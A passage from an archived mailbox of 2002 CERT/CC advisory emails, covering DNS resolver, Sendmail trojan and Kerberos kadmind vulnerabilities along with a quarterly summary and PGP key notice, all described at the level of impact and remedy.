the end of this message. The following change was made to section III. of CA-2002-19: ====================================================================== III. Solution Upgrade to a corrected version of the DNS resolver libraries [no change] Use of a local caching DNS server is not an effective workaround When this advisory was initially published, it was thought that a caching DNS server that reconstructs DNS responses would prevent malicious code from reaching systems with vulnerable resolver libraries. This workaround is not sufficient. It does not prevent some DNS responses that contain malicious code from reaching clients, whether or not the responses are reconstructed by a local caching DNS server. DNS responses containing code that is capable of exploiting the vulnerabilities described in VU#803539 and VU#542971 can be cached and reconstructed before being transmitted to clients. Since the server may cache the responses, the malicious code could persist until the server's cache is purged or the entries expire. The only complete solution to this problem is to upgrade to a corrected version of the DNS resolver libraries as noted above. ====================================================================== The following documents have been revised: CERT Advisory CA-2002-19 http://www.cert.org/advisories/CA-2002-19.html Vulnerability Note VU#803539 http://www.kb.cert.org/vuls/id/803539 Vulnerability Note VU#542971 http://www.kb.cert.org/vuls/id/542971 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iQCVAwUBPWwncKCVPMXQI2HJAQKyqwP+NByjCM2eHhboD9L5PIrDTVs6eXv0qFcG zc8Hv1j/7I9I7oK4JwJUKLO83DvLxsEyCd+ooV32eBSw4UFsh+vbZz9On9XkDApf f6VRPIyKNBAQp8p1x+LpuH5Q1qIVMXBo1Y6NtiwAcn/WnTDq8McGSqCrMV+NRChI EfhhbZqnW6s= =yEmz -----END PGP SIGNATURE----- From - Fri Aug 30 16:44:07 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g7UNhq7D014112; Fri, 30 Aug 2002 16:43:52 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id g7ULimU12279; Fri, 30 Aug 2002 17:44:48 -0400 Date: Fri, 30 Aug 2002 17:44:48 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2002-03 Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 532 Status: RO X-Status: X-Keywords: X-UID: 60 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2002-03 August 30, 2002 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available at http://www.cert.org/summaries/. ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issues in May 2002 (CS-2002-02), we have released several advisories, published statistics for the second quarter of 2002, and written numerous white papers. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. 1. Multiple Vulnerabilities in CDE ToolTalk The Common Desktop Environment (CDE) ToolTalk RPC database server contains a buffer overflow vulnerability that could allow a remote attacker to execute arbitrary code or cause a denial of service. CERT Advisory CA-2002-26: Buffer Overflow in CDE ToolTalk http://www.cert.org/advisories/CA-2002-26.html Two vulnerabilities have been discovered in the Common Desktop Environment (CDE) ToolTalk RPC database server. The first vulnerability could be used by a remote attacker to delete arbitrary files, cause a denial of service, or possibly execute arbitrary code or commands. The second vulnerability could allow a local attacker to overwrite arbitrary files with contents of the attacker's choice. CERT Advisory CA-2002-20: Multiple Vulnerabilities in CDE ToolTalk http://www.cert.org/advisories/CA-2002-20.html 2. Integer Overflow in XDR Library There is an integer overflow present in the xdr_array() function distributed as part of the Sun Microsystems XDR library. This overflow has been shown to lead to remotely exploitable buffer overflows in multiple applications, leading to the execution of arbitrary code. Although the library was originally distributed by Sun Microsystems, multiple vendors have included the vulnerable code in their own implementations. CERT Advisory CA-2002-25: Integer Overflow in XDR Library http://www.cert.org/advisories/CA-2002-25.html 3. Multiple Vulnerabilities in OpenSSL There are four remotely exploitable buffer overflows in OpenSSL. There are also encoding problems in the ASN.1 library used by OpenSSL. Several of these vulnerabilities could be used by a remote attacker to execute arbitrary code on the target system. All could be used to create denial of service. CERT Advisory CA-2002-23: Multiple Vulnerabilities in OpenSSL http://www.cert.org/advisories/CA-2002-23.html 4. Multiple Vulnerabilities in Microsoft SQL Server The CERT/CC is still receiving reports of systems being compromised by exploiting vulnerabilities in Microsoft SQL Server. The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database contents, compromise SQL servers, and, in some configurations, compromise server hosts. CERT Advisory CA-2002-22: Multiple Vulnerabilities in Microsoft SQL Server http://www.cert.org/advisories/CA-2002-22.html 5. Buffer Overflows in Multiple DNS Resolver Libraries Buffer overflow vulnerabilities exist in multiple implementations of DNS resolver libraries. Operating systems and applications that utilize vulnerable DNS resolver libraries may be affected. CERT Advisory CA-2002-19: Buffer Overflows in Multiple DNS Resolver Libraries http://www.cert.org/advisories/CA-2002-19.html 6. OpenSSH Vulnerabilities in Challenge Response Handling There are two related vulnerabilities in the challenge response handling code in OpenSSH versions 2.3.1p1 through 3.3. They may allow a remote intruder to execute arbitrary code as the user running sshd (often root). The first vulnerability affects OpenSSH versions 2.9.9 through 3.3, that have the challenge response option enabled, and use SKEY or BSD_AUTH authentication. The second vulnerability affects PAM modules using interactive keyboard authentication in OpenSSH versions 2.3.1p1 through 3.3, regardless of the challenge response option setting. CERT Advisory CA-2002-18: OpenSSH Vulnerabilities in Challenge Response Handling http://www.cert.org/advisories/CA-2002-18.html 7. Apache Web Server Chunk Handling Vulnerability There is a remotely exploitable vulnerability in the handling of large chunks of data in web servers that are based on Apache source code. This vulnerability is present by default in configurations of Apache web servers versions 1.3 through 1.3.24 and versions 2.0 through 2.0.36. The impact of this vulnerability is dependent upon the software version and the hardware platform the server is running on. CERT Advisory CA-2002-17: Apache Web Server Chunk Handling Vulnerability http://www.cert.org/advisories/CA-2002-17.html 8. Denial-of-Service Vulnerability in ISC BIND 9 A denial-of-service vulnerability exists in version 9 of the Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) server. ISC BIND versions 8 and 4 are not affected. Exploiting this vulnerability will cause the BIND server to shut down. CERT Advisory CA-2002-15: Denial-of-Service Vulnerability in ISC BIND 9 http://www.cert.org/advisories/CA-2002-15.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new or updated * Advisories * Incident Notes * CERT/CC Statistics * Tech Tips * White Papers + Securing an Internet Name Server + Creating a Computer Security Incident Response Team: A Process for Getting Started + Flow-Service-Quality (FSQ) Engineering: Foundations for Network System Analysis and Development + A Brief Tour of the Simple Network Management Protocol + Information Survivability: Required Shifts in Perspective ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2002 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPW/YUqCVPMXQI2HJAQF09wP/bMHhIj2+bFvWrowsfqObNhHopNYpr0Jj VjsYIhzpUISRTefEGArKCoww/Zp7qnVEp/RN7O1mkRRdt9zhGMWHQhta8tCgmsX5 ADYelx3NEUteT1Ui5xnl4THEMtiMC8knPeDCH6RCKnfnpAFhsCYxebhPQchYUG+Z SS8A1klR0Q0= =K40G -----END PGP SIGNATURE----- From - Thu Sep 19 17:09:45 2002 Return-Path: Received: from wss100.berkeley.edu (wss100.Berkeley.EDU [128.32.25.64]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g8K016CX005117; Thu, 19 Sep 2002 17:01:06 -0700 (PDT) Received: from uclink4.berkeley.edu (localhost.localdomain [127.0.0.1]) by wss100.berkeley.edu (8.11.6/8.11.6) with ESMTP id g8K014p13730; Thu, 19 Sep 2002 17:01:04 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g8K013oq009928; Thu, 19 Sep 2002 17:01:04 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id g8JMBa512498; Thu, 19 Sep 2002 18:11:36 -0400 Date: Thu, 19 Sep 2002 18:11:36 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: New CERT/CC PGP Key Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 592 Status: RO X-Status: X-Keywords: X-UID: 61 -----BEGIN PGP SIGNED MESSAGE----- New CERT® Coordination Center (CERT/CC) PGP Key The current CERT/CC PGP key will expire on Tuesday, October 1, 2002. We use this key to sign all outgoing email, including advisories sent to this list. A new key is available and will be valid until Wednesday, October 1, 2003. To obtain further information or to download the new CERT/CC public PGP key, please visit http://www.cert.org/contact_cert/encryptmail.html A copy of the new key has also been included at the bottom of this message. If you have any questions or comments regarding this information, please contact our hotline at +1 412-268-7090 or email us at cert@cert.org. ______________________________________________________________________ This document is available from: http://www.cert.org/pgp/newpgp2002.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message: subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information http://www.cert.org/legal_stuff.html Copyright 2001, 2002 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPYogk6CVPMXQI2HJAQEJoQP/Tma4QfM4x7L2slJwt0JTDC5je2axAdLB zGMuAkyeyrJ18uuiC/R20WApWVV0rpqN1t92lClKFArTvGKVCi0fBA+UgV/UHJf0 Ebc+8Jp7+VEhTRMYN47a+0o6YJaDvyR/d/MAK2lnlqYwHcxgHoxjBfGQMDsbj498 WLecb/E5MkQ= =vvhT -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQCNAz2HdYUBewEEANlrALUkkCRO3Ptc9UMJggXbTVD2jHOZBurJOi3j3iNbPGJT iUFCFJ8pEjeO/DIgmyvZ5iyekbAlIX80JP9nWylz1VN2r4VbsS4T5kAe6V2+8rVO rioWEcrgO4rPhir8hWJvMt8NoZzchCoIj0u9PoNxHuUGL2NGJmjtSoHZUTs5AAUR tChDRVJUIENvb3JkaW5hdGlvbiBDZW50ZXIgPGNlcnRAY2VydC5vcmc+iQCVAwUQ PYd1hWjtSoHZUTs5AQF1MAP+OT0ZsrydA6LLmmJFnAF4duhk/qRn+ilih35q9Mof Zed2yIhGvOpZ2D/UgaiAsrpjqPj1Rz6F4RUMEDLCDIDrAPVYwg+OAcCdWPXv3olU 3ihT/5/SMZBU3f6/qbcgxuwFWwwe809cF74li6LWhb42aui75xmF7o5wQOnVUTP8 8OuIRgQQEQIABgUCPYd24QAKCRBdive2pwqEYwj4AJ9jKsdH2rZC9F5xIhCnrjcF vGLPBgCghO5OnL2DgXDM8sFxp78KDQSzpQ+JAJUDBRA9h3b+oJU8xdAjYckBAej4 A/4yIIw8yOLGx3Pt0nQTEaOMBPj2RngxFkJb6eDX38BSNq1M5AHXnIjF62AyBDNW eUu5VGeQv1eRb7oCFqmkdh1xWWxFKFFaZptzT3/CYtFadwk8AUqQSOu7q5MoeDQb vcl2twhlPQCD5LBk5n6l51SekswG9Y3ByKZ8hn+LTLUUGohGBBARAgAGBQI9h3cN AAoJEEkI6HrAePTS6pkAoNWHrTy0cDJUM3zC9Yvgf4BvdIFzAKDCKF9CayeKYLhh oLGzdJubDXpihohGBBARAgAGBQI9h60jAAoJEEyjwJ0liX560jwAoNKoURldCD65 GuBko4W9iNWjgpZXAKC3Fqz5pV51ACy9izsQhp18awI4/IhGBBARAgAGBQI9h8Fv AAoJEJP/BRA2wmijEOYAoPop4W5FWqIJNQA5Mb0D4uSe6/U9AKDr4L++kuaWJRLW IGmZPbGIlhjFNw== =KTsH -----END PGP PUBLIC KEY BLOCK----- From - Tue Oct 8 16:54:13 2002 Return-Path: Received: from wss100.berkeley.edu (wss100.Berkeley.EDU [128.32.25.64]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g98NosiJ026458; Tue, 8 Oct 2002 16:50:54 -0700 (PDT) Received: from uclink4.berkeley.edu (localhost.localdomain [127.0.0.1]) by wss100.berkeley.edu (8.11.6/8.11.6) with ESMTP id g98Noqp14462; Tue, 8 Oct 2002 16:50:52 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g98NopLv019456; Tue, 8 Oct 2002 16:50:51 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id g98LrwF01526; Tue, 8 Oct 2002 17:53:58 -0400 Date: Tue, 8 Oct 2002 17:53:58 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-28 Trojan Horse Sendmail Distribution Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 857 Status: RO X-Status: X-Keywords: X-UID: 62 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-28 Trojan Horse Sendmail Distribution Original release date: October 08, 2002 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Overview The CERT/CC has received confirmation that some copies of the source code for the Sendmail package were modified by an intruder to contain a Trojan horse. Sites that employ, redistribute, or mirror the Sendmail package should immediately verify the integrity of their distribution. I. Description The CERT/CC has received confirmation that some copies of the source code for the Sendmail package have been modified by an intruder to contain a Trojan horse. The following files were modified to include the malicious code: sendmail.8.12.6.tar.Z sendmail.8.12.6.tar.gz These files began to appear in downloads from the FTP server ftp.sendmail.org on or around September 28, 2002. The Sendmail development team disabled the compromised FTP server on October 6, 2002 at approximately 22:15 PDT. It does not appear that copies downloaded via HTTP contained the Trojan horse; however, the CERT/CC encourages users who may have downloaded the source code via HTTP during this time period to take the steps outlined in the Solution section as a precautionary measure. The Trojan horse versions of Sendmail contain malicious code that is run during the process of building the software. This code forks a process that connects to a fixed remote server on 6667/tcp. This forked process allows the intruder to open a shell running in the context of the user who built the Sendmail software. There is no evidence that the process is persistent after a reboot of the compromised system. However, a subsequent build of the Trojan horse Sendmail package will re-establish the backdoor process. II. Impact An intruder operating from the remote address specified in the malicious code can gain unauthorized remote access to any host that compiled a version of Sendmail from this Trojan horse version of the source code. The level of access would be that of the user who compiled the source code. It is important to understand that the compromise is to the system that is used to build the Sendmail software and not to the systems that run the Sendmail daemon. Because the compromised system creates a tunnel to the intruder-controlled system, the intruder may have a path through network access controls. III. Solution Obtain an authentic version Sendmail The primary distribution site for Sendmail is http://www.sendmail.org/ Sites that mirror the Sendmail source code are encouraged to verify the integrity of their sources. Verify software authenticity We strongly encourage sites that recently downloaded a copy of the Sendmail distribution to verify the authenticity of their distribution, regardless of where it was obtained. Furthermore, we encourage users to inspect any and all software that may have been downloaded from the compromised site. Note that it is not sufficient to rely on the timestamps or sizes of the file when trying to determine whether or not you have a copy of the Trojan horse version. Verify PGP signatures The Sendmail source distribution is cryptographically signed with the following PGP key: pub 1024R/678C0A03 2001-12-18 Sendmail Signing Key/2002 Key fingerprint = 7B 02 F4 AA FC C0 22 DA 47 3E 2A 9A 9B 35 22 45 The Trojan horse copy did not include an updated PGP signature, so attempts to verify its integrity would have failed. The sendmail.org staff has verified that the Trojan horse copies did indeed fail PGP signature checks. Verify MD5 checksums In the absence of PGP, you can use the following MD5 checksums to verify the integrity of your Sendmail source code distribution: Correct versions: 73e18ea78b2386b774963c8472cbd309 sendmail.8.12.6.tar.gz cebe3fa43731b315908f44889d9d2137 sendmail.8.12.6.tar.Z 8b9c78122044f4e4744fc447eeafef34 sendmail.8.12.6.tar.sig As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software. For more information, see http://www.cert.org/incident_notes/IN-2001-06.html Employ egress filtering Egress filtering manages the flow of traffic as it leaves a network under your administrative control. In the case of the Trojan horse Sendmail distribution, employing egress filtering can help prevent systems on your network from connecting to the remote intruder-controlled system. Blocking outbound TCP connections to port 6667 from your network reduces the risk of internal compromised machines communicating with the remote system. Build software as an unprivileged user Sites are encouraged to build software from source code as an unprivileged, non-root user on the system. This can lessen the immediate impact of Trojan horse software. Compiling software that contains Trojan horses as the root user results in a compromise that is much more difficult to reliably recover from than if the Trojan horse is executed as a normal, unprivileged user on the system. Recovering from a system compromise If you believe a system under your administrative control has been compromised, please follow the steps outlined in Steps for Recovering from a UNIX or NT System Compromise Reporting The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to cert@cert.org with the following text included in the subject line: "[CERT#33376]". Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. _________________________________________________________________ The CERT Coordination Center thanks the staff at the Sendmail Consortium for bringing this issue to our attention. _________________________________________________________________ Feedback can be directed to the authors: Chad Dougherty, Marty Lindner. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-28.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History October 08, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPaNCtmjtSoHZUTs5AQHXrgQA2CkSFrIQxV9dLy07J0ezZgT2RrfCDpXY lPO0HhPe4kcbw4AMXs5LAjhA7DoW32PjAytRWOCNMu1FFDbl3eohf7OP2ZjtgYnD kwpfjPKVejJDD1BX2O/+jb1rlUKOm2tIt7NK+w8HKOKUYZal/x3RI3AxnAAGLv8A /DNWpyNYsGg= =fL1h -----END PGP SIGNATURE----- From - Fri Oct 25 13:58:50 2002 Return-Path: Received: from wss100.berkeley.edu (wss100.Berkeley.EDU [128.32.25.64]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g9PK6t2t015892; Fri, 25 Oct 2002 13:06:55 -0700 (PDT) Received: from uclink4.berkeley.edu (localhost.localdomain [127.0.0.1]) by wss100.berkeley.edu (8.11.6/8.11.6) with ESMTP id g9PK6rW00754; Fri, 25 Oct 2002 13:06:53 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g9PK6qH8007211; Fri, 25 Oct 2002 13:06:52 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id g9PHtGo28442; Fri, 25 Oct 2002 13:55:16 -0400 Date: Fri, 25 Oct 2002 13:55:16 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-29 Buffer Overflow in Kerberos Administration Daemon Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1155 Status: RO X-Status: X-Keywords: X-UID: 63 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-29 Buffer Overflow in Kerberos Administration Daemon Original issue date: October 25, 2002 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * MIT Kerberos version 4 and version 5 up to and including krb5-1.2.6 * KTH eBones prior to version 1.2.1 and KTH Heimdal prior to version 0.5.1 * Other Kerberos implementations derived from vulnerable MIT or KTH code Overview Multiple Kerberos distributions contain a remotely exploitable buffer overflow in the Kerberos administration daemon. A remote attacker could exploit this vulnerability to gain root privileges on a vulnerable system. The CERT/CC has received reports that indicate that this vulnerability is being exploited. In addition, MIT advisory MITKRB5-SA-2002-002 notes that an exploit is circulating. We strongly encourage sites that use vulnerable Kerberos distributions to verify the integrity of their systems and apply patches or upgrade as appropriate. I. Description Kerberos is a widely used network protocol that uses strong cryptography to authenticate clients and servers. The Kerberos administration daemon (typically called kadmind) handles password change and other requests to modify the Kerberos database. The daemon runs on the master Key Distribution Center (KDC) server of a Kerberos realm. The code that provides legacy support for the Kerberos 4 administration protocol contains a remotely exploitable buffer overflow. The vulnerable code does not adequately validate data read from a network request. This data is subsequently used as an argument to a memcpy() call, which can overflow a buffer allocated on the stack. An attacker does not have to authenticate in order to exploit this vulnerability, and the Kerberos administration daemon runs with root privileges. Both Massachusetts Institute of Technology (MIT) and Kungl Tekniska Högskolan (KTH) Kerberos are affected, as well as operating systems, applications, and other Kerberos implementations that use vulnerable code derived from either the MIT or KTH distributions. In MIT Kerberos 5, the Kerberos 4 administration daemon is implemented in kadmind4. In KTH Kerberos 4 (eBones), the Kerberos administration daemon is implemented in kadmind. KTH Kerberos 5 (Heimdal) also implements the daemon in kadmind; however, the Heimdal daemon is only affected if compiled with Kerberos 4 support. Since the vulnerable Kerberos administration daemon is included in the MIT Kerberos 5 and KTH Heimdal distributions, both Kerberos 4 sites and Kerberos 5 sites that enable support for the Kerberos 4 administration protocol are affected. Further information about this vulnerability may be found in VU#875073. MIT has released an advisory that contains information about this vulnerability: http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-kadm 4.txt The KTH eBones and Heimdal web sites also contain information about this vulnerability: KTH eBones http://www.pdc.kth.se/kth-krb/ KTH Heimdal http://www.pdc.kth.se/kth-krb/ In addition to resolving the vulnerability described in VU#875073, version 0.51 of KTH Heimdal contains other fixes related to the KDC. See the ChangeLog for more information: ftp://ftp.pdc.kth.se/pub/heimdal/src/heimdal-0.5-0.5.1.diff.gz This vulnerability has been assigned CAN-2002-1235 by the Common Vulnerabilities and Exposures (CVE) group. II. Impact An unauthenticated, remote attacker could execute arbitrary code with root privileges. If an attacker is able to gain control of a master KDC, the integrity of the entire Kerberos realm is compromised, including user and host identities and other systems that accept Kerberos authentication. III. Solution Apply a patch or upgrade Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A below and the Systems Affected section of VU#875073 for specific information. Disable vulnerable service Disable support for the Kerberos 4 administration protocol if it is not needed. In MIT Kerberos 5, this can be achieved by disabling kadmind4. For information about disabling all Kerberos 4 support in MIT Kerberos 5 at compile time, see http://web.mit.edu/kerberos/www/krb5-1.2/krb5-1.2.6/doc/install.htm l#SEC24 In KTH Heimdal, it is necessary to recompile kadmind in order to disable support for the Kerberos 4 administration protocol. For information about disabling all Kerberos 4 support in KTH Heimdal at compile time, see http://www.pdc.kth.se/heimdal/heimdal.html#Building%20and%20Install ing This solution will prevent Kerberos 4 administrative clients from accessing the Kerberos database. It will also prevent users with Kerberos 4 clients from changing their passwords. In general, the CERT/CC recommends disabling any service that is not explicitly required. Block or restrict access Block access to the Kerberos administration service from untrusted networks such as the Internet. Furthermore, only allow access to the service from trusted administrative hosts. By default, the Kerberos 4 administration daemon listens on 751/tcp and 751/udp, and the Kerberos 5 administration daemon listens on 749/tcp and 749/udp. It may be necessary to block access to the Kerberos 5 administration service if the daemon also supports the Kerberos 4 administration protocol. This workaround will prevent administrative connections and password change requests from blocked networks. Note that this workaround will not prevent exploitation, but it will limit the possible sources of attacks. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Apple Computer, Inc. The Kerberos Administration Daemon was included in Mac OS X 10.0, but removed in Mac OS X 10.1 and later. We encourage sites that use vulnerable Kerberos distributions to verify the integrity of their systems and apply patches or upgrade as appropriate. Conectiva Our MIT Kerberos 5 packages in Conectiva Linux 8 do contain the vulnerable kadmind4 daemon, but it is not used by default nor is it installed as a service. Updated packages are being uploaded to our ftp server and should be available in a few hours at: ftp://atualizacoes.conectiva.com.br/8/ The krb5-server-1.2.3-3U8_3cl.i386.rpm package contains a patched kadmind4 daemon. An announcement will be sent to our security mailing list a few hours after the upload is complete. Debian Debian has released DSA-178: http://www.debian.org/security/2002/dsa-178 FreeBSD Both the FreeBSD base Kerberos 4 (kadmind) and Kerberos 5 (k5admind v4 compatibility) daemons were vulnerable and have been corrected as of 23 October 2002. In addition, the heimdal and krb5 ports contained the same vulnerability and have been corrected as of 24 October 2002. A Security Advisory is in progress. KTH Kerberos The eBones and Heimdal web sites have information about this vulnerability: KTH eBones http://www.pdc.kth.se/kth-krb/ KTH Heimdal http://www.pdc.kth.se/kth-krb/ Microsoft Corporation Microsoft's implementation of Kerberos is not affected by this vulnerability. MIT Kerberos MIT has released MIT krb5 Security Advisory 2002-002: http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-ka dm4.txt NetBSD NetBSD has released NetBSD-SA2002-026: ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2002 -026.txt.asc OpenBSD OpenBSD has released Security Fix 016 for OpenBSD 3.1 and Security Fix 033 for OpenBSD 3.0. OpenBSD 3.1 http://www.openbsd.org/errata31.html#kadmin OpenBSD 3.0 http://www.openbsd.org/errata30.html#kadmin Openwall Openwall GNU/*/Linux is not vulnerable. We don't provide Kerberos. SuSE SuSE Linux 7.2 and later are shipped with Heimdal Kerberos included, but Kerberos 4 support is disabled in all releases. Therefore, SuSE Linux and SuSE Enterprise Linux are not affected by this bug. [See also: SuSE-SA:2002:034] Wind River Systems (BSDI) No version of BSD/OS is vulnerable to this problem. Appendix B. References * http://web.mit.edu/kerberos/www/ * http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-kad m4.txt * http://web.mit.edu/kerberos/www/krb5-1.2/krb5-1.2.6/doc/install.ht ml#SEC24 * http://www.pdc.kth.se/kth-krb/ * http://www.pdc.kth.se/heimdal/ * http://www.pdc.kth.se/heimdal/heimdal.html#Building%20and%20Instal ling _________________________________________________________________ Authors: Art Manion and Jason A. Rafail. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-29.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO 